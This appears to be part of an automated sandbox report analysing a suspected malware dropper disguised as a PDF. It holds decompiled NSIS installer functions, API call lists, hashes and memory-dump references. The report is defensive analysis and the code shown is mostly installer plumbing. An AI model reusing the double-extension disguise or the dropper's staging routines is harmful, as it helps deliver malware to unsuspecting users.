                                                                        • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
                                                                        • Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76A63420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                                        • Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                                        • Part of subcall function 004064A6: CharNextW.USER32(?,00000000,76A63420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                                        • Part of subcall function 004064A6: CharPrevW.USER32(?,?,76A63420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                                      • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 004049B9
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
                                                                        • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                                        • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
                                                                        • Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: (7B$A$C:\Users\user\AppData\Local\Deskriptiv155\Hjertere$Call
                                                                      • API String ID: 2624150263-1844849377
                                                                      • Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                                      • Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
                                                                      • Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
                                                                      • Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040287E Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 39%
                                                                      			E0040287E(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402C53(2), _t21 - 0x2b8) != 0xffffffff) {
					E00406159( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x28c);
					_push(__esi);
					E00406212();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                      0x00402896
                                                                      0x004028b1
                                                                      0x004028bc
                                                                      0x004028bd
                                                                      0x004029f7
                                                                      0x00402898
                                                                      0x0040289b
                                                                      0x0040289e
                                                                      0x004028a1
                                                                      0x004028a1
                                                                      0x00402ade
                                                                      0x00402aea

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040288D
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: 4ffde31f200a56b70c0ba9511d660eba236eae0b469ea88093915e34c530c806
                                                                      • Instruction ID: 47d6d4f0c9e08c45c0f9c68b677465f339eb18c6442485c4f22287ce904ecf90
                                                                      • Opcode Fuzzy Hash: 4ffde31f200a56b70c0ba9511d660eba236eae0b469ea88093915e34c530c806
                                                                      • Instruction Fuzzy Hash: 76F08971A04104DBDB50EBE4D94999DB374EF14314F2185BBE112F71D0D7B849819B29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404473 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E00404473(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				short* _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x4216f4 =  *0x4216f4 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040433D(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281e0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								ShellExecuteW(_a4, L"open", _v8, 0, 0, "true");
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a248, 0x111, "true", 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a248, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x422700; // 0x4cd37c
						_t29 = _t69 + 0x14; // 0x4cd390
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004042F8(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404706();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42921c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a278 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404424;
				if(_t110 != 2) {
					_v8 = E004043EA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004042D6(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004042D6(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, "true");
				E004042F8( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040430B(_t118);
				SendMessageW(_t118, 0x45b, "true", 0);
				_t92 =  *( *0x42a250 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216f4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216f4 = 0;
				return 0;
			}



















                                                                      0x00404485
                                                                      0x004045b2
                                                                      0x0040460f
                                                                      0x00404613
                                                                      0x004046e8
                                                                      0x004046ea
                                                                      0x004046ea
                                                                      0x004046f0
                                                                      0x004046f0
                                                                      0x004046f3
                                                                      0x00000000
                                                                      0x004046fa
                                                                      0x00404621
                                                                      0x00404627
                                                                      0x00404631
                                                                      0x0040463c
                                                                      0x0040463f
                                                                      0x00404642
                                                                      0x0040464d
                                                                      0x00404650
                                                                      0x00404657
                                                                      0x00404664
                                                                      0x00404675
                                                                      0x0040468a
                                                                      0x00404699
                                                                      0x0040469f
                                                                      0x0040469f
                                                                      0x00404657
                                                                      0x004046a9
                                                                      0x00000000
                                                                      0x004046b4
                                                                      0x004046b8
                                                                      0x004046c8
                                                                      0x004046c8
                                                                      0x004046ce
                                                                      0x004046da
                                                                      0x004046da
                                                                      0x00000000
                                                                      0x004046de
                                                                      0x004046a9
                                                                      0x004045bd
                                                                      0x00000000
                                                                      0x004045cf
                                                                      0x004045cf
                                                                      0x004045d4
                                                                      0x004045d4
                                                                      0x004045da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404603
                                                                      0x00404605
                                                                      0x0040460a
                                                                      0x00000000
                                                                      0x0040460a
                                                                      0x004045bd
                                                                      0x0040448b
                                                                      0x0040448e
                                                                      0x00404493
                                                                      0x004044a4
                                                                      0x004044a4
                                                                      0x004044ac
                                                                      0x004044af
                                                                      0x004044b3
                                                                      0x004044b6
                                                                      0x004044ba
                                                                      0x004044bd
                                                                      0x004044c0
                                                                      0x004044c3
                                                                      0x004044ca
                                                                      0x004044cc
                                                                      0x004044cc
                                                                      0x004044d6
                                                                      0x004044e3
                                                                      0x004044ed
                                                                      0x004044f2
                                                                      0x004044f5
                                                                      0x004044fa
                                                                      0x00404511
                                                                      0x00404518
                                                                      0x0040452b
                                                                      0x0040452e
                                                                      0x00404542
                                                                      0x00404549
                                                                      0x0040454e
                                                                      0x00404553
                                                                      0x00404553
                                                                      0x00404561
                                                                      0x0040456f
                                                                      0x00404581
                                                                      0x00404586
                                                                      0x00404596
                                                                      0x00404598
                                                                      0x00000000

                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 00404511
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404525
                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404542
                                                                      • GetSysColor.USER32(?), ref: 00404553
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404561
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040456F
                                                                      • lstrlenW.KERNEL32(?), ref: 00404574
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404581
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404596
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004045EF
                                                                      • SendMessageW.USER32(00000000), ref: 004045F6
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404621
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404664
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404672
                                                                      • SetCursor.USER32(00000000), ref: 00404675
                                                                      • ShellExecuteW.SHELL32(0000070B,open,004281E0,00000000,00000000,?), ref: 0040468A
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404696
                                                                      • SetCursor.USER32(00000000), ref: 00404699
                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 004046C8
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004046DA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: Call$N$open$C@
                                                                      • API String ID: 3615053054-3980584120
                                                                      • Opcode ID: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                                      • Instruction ID: 5d26fd4bbf68afdbde40cdeb5130b050e05e11fe2774b22c09997c19ee455d7e
                                                                      • Opcode Fuzzy Hash: 20fac1330af19db95ab999e4fecb6d9798aa17533202641e6ca464adf65f76bc
                                                                      • Instruction Fuzzy Hash: 507193B1A00209BFDB109F60DD85E6A7B69FB85344F00843AFA41B62E0D77D9961DF68
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a250;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, "true");
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429240, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a248;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                      0x0040100a
                                                                      0x00401039
                                                                      0x00401047
                                                                      0x0040104d
                                                                      0x00401051
                                                                      0x0040105b
                                                                      0x00401061
                                                                      0x00401064
                                                                      0x004010f3
                                                                      0x00401089
                                                                      0x0040108c
                                                                      0x004010a6
                                                                      0x004010bd
                                                                      0x004010cc
                                                                      0x004010cf
                                                                      0x004010d5
                                                                      0x004010d9
                                                                      0x004010e4
                                                                      0x004010ed
                                                                      0x004010ef
                                                                      0x004010ef
                                                                      0x00401100
                                                                      0x00401105
                                                                      0x0040110d
                                                                      0x00401110
                                                                      0x00401112
                                                                      0x00401118
                                                                      0x0040111f
                                                                      0x00401126
                                                                      0x00401130
                                                                      0x00401142
                                                                      0x00401156
                                                                      0x00401160
                                                                      0x00401165
                                                                      0x00401165
                                                                      0x00401110
                                                                      0x0040116e
                                                                      0x00000000
                                                                      0x00401178
                                                                      0x00401010
                                                                      0x00401013
                                                                      0x00401015
                                                                      0x0040101f
                                                                      0x0040101f
                                                                      0x00000000

                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                                      • Instruction ID: fbc3582f0be17511ef24b6208279bd62f68a22b1f89f17edcf88e24f0ff4dafb
                                                                      • Opcode Fuzzy Hash: 709e975422cda7ccbb1a7a25ffea5b6ea87087be701c8afe7ff27c60fd663942
                                                                      • Instruction Fuzzy Hash: 8E418A71800209AFCF058F95DE459AFBBB9FF44310F00842EF991AA1A0C738EA55DFA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405F41 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00405F41(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t13;
				long _t25;
				char* _t32;
				int _t38;
				void* _t39;
				intOrPtr* _t40;
				long _t43;
				WCHAR* _t45;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t54;

				_t39 = __ecx;
				lstrcpyW(0x426dc8, L"NUL");
				_t45 =  *(_t53 + 0x18);
				if(_t45 == 0) {
					L3:
					_t13 = GetShortPathNameW( *(_t53 + 0x1c), 0x4275c8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						_t38 = wsprintfA(0x4269c8, "%ls=%ls\r\n", 0x426dc8, 0x4275c8);
						_t54 = _t53 + 0x10;
						E00406234(_t38, 0x400, 0x4275c8, 0x4275c8,  *((intOrPtr*)( *0x42a250 + 0x128)));
						_t13 = E00405DE7(0x4275c8, 0xc0000000, 4);
						_t49 = _t13;
						 *(_t54 + 0x18) = _t49;
						if(_t49 != 0xffffffff) {
							_t43 = GetFileSize(_t49, 0);
							_t6 = _t38 + 0xa; // 0xa
							_t47 = GlobalAlloc(0x40, _t43 + _t6);
							if(_t47 == 0 || E00405E6A(_t49, _t47, _t43) == 0) {
								L18:
								return CloseHandle(_t49);
							} else {
								if(E00405D4C(_t39, _t47, "[Rename]\r\n") != 0) {
									_t50 = E00405D4C(_t39, _t22 + 0xa, "\n[");
									if(_t50 == 0) {
										_t49 =  *(_t54 + 0x18);
										L16:
										_t25 = _t43;
										L17:
										E00405DA2(_t25 + _t47, 0x4269c8, _t38);
										SetFilePointer(_t49, 0, 0, 0);
										E00405E99(_t49, _t47, _t43 + _t38);
										GlobalFree(_t47);
										goto L18;
									}
									_t40 = _t47 + _t43;
									_t32 = _t40 + _t38;
									while(_t40 > _t50) {
										 *_t32 =  *_t40;
										_t32 = _t32 - 1;
										_t40 = _t40 - 1;
									}
									_t25 = _t50 - _t47 + 1;
									_t49 =  *(_t54 + 0x18);
									goto L17;
								}
								lstrcpyA(_t47 + _t43, "[Rename]\r\n");
								_t43 = _t43 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DE7(_t45, 0, "true"));
					_t13 = GetShortPathNameW(_t45, 0x426dc8, 0x400);
					if(_t13 != 0 && _t13 <= 0x400) {
						goto L3;
					}
				}
				return _t13;
			}



















                                                                      0x00405f41
                                                                      0x00405f50
                                                                      0x00405f56
                                                                      0x00405f67
                                                                      0x00405f8f
                                                                      0x00405f9a
                                                                      0x00405f9e
                                                                      0x00405fbe
                                                                      0x00405fc5
                                                                      0x00405fcf
                                                                      0x00405fdc
                                                                      0x00405fe1
                                                                      0x00405fe6
                                                                      0x00405fea
                                                                      0x00405ff9
                                                                      0x00405ffb
                                                                      0x00406008
                                                                      0x0040600c
                                                                      0x004060a7
                                                                      0x00000000
                                                                      0x00406022
                                                                      0x0040602f
                                                                      0x00406053
                                                                      0x00406057
                                                                      0x00406076
                                                                      0x0040607a
                                                                      0x0040607a
                                                                      0x0040607c
                                                                      0x00406085
                                                                      0x00406090
                                                                      0x0040609b
                                                                      0x004060a1
                                                                      0x00000000
                                                                      0x004060a1
                                                                      0x00406059
                                                                      0x0040605c
                                                                      0x00406067
                                                                      0x00406063
                                                                      0x00406065
                                                                      0x00406066
                                                                      0x00406066
                                                                      0x0040606e
                                                                      0x00406070
                                                                      0x00000000
                                                                      0x00406070
                                                                      0x0040603a
                                                                      0x00406040
                                                                      0x00000000
                                                                      0x00406040
                                                                      0x0040600c
                                                                      0x00405fea
                                                                      0x00405f69
                                                                      0x00405f74
                                                                      0x00405f7d
                                                                      0x00405f81
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405f81
                                                                      0x004060b2

                                                                      APIs
                                                                      • lstrcpyW.KERNEL32(00426DC8,NUL), ref: 00405F50
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,004060D4,?,?), ref: 00405F74
                                                                      • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00405F7D
                                                                        • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                                        • Part of subcall function 00405D4C: lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                                      • GetShortPathNameW.KERNEL32(004275C8,004275C8,00000400), ref: 00405F9A
                                                                      • wsprintfA.USER32 ref: 00405FB8
                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 00405FF3
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406002
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040603A
                                                                      • SetFilePointer.KERNEL32(0040A588,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A588,00000000,[Rename],00000000,00000000,00000000), ref: 00406090
                                                                      • GlobalFree.KERNEL32(00000000), ref: 004060A1
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004060A8
                                                                        • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.exe,80000000,00000003), ref: 00405DEB
                                                                        • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405E0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
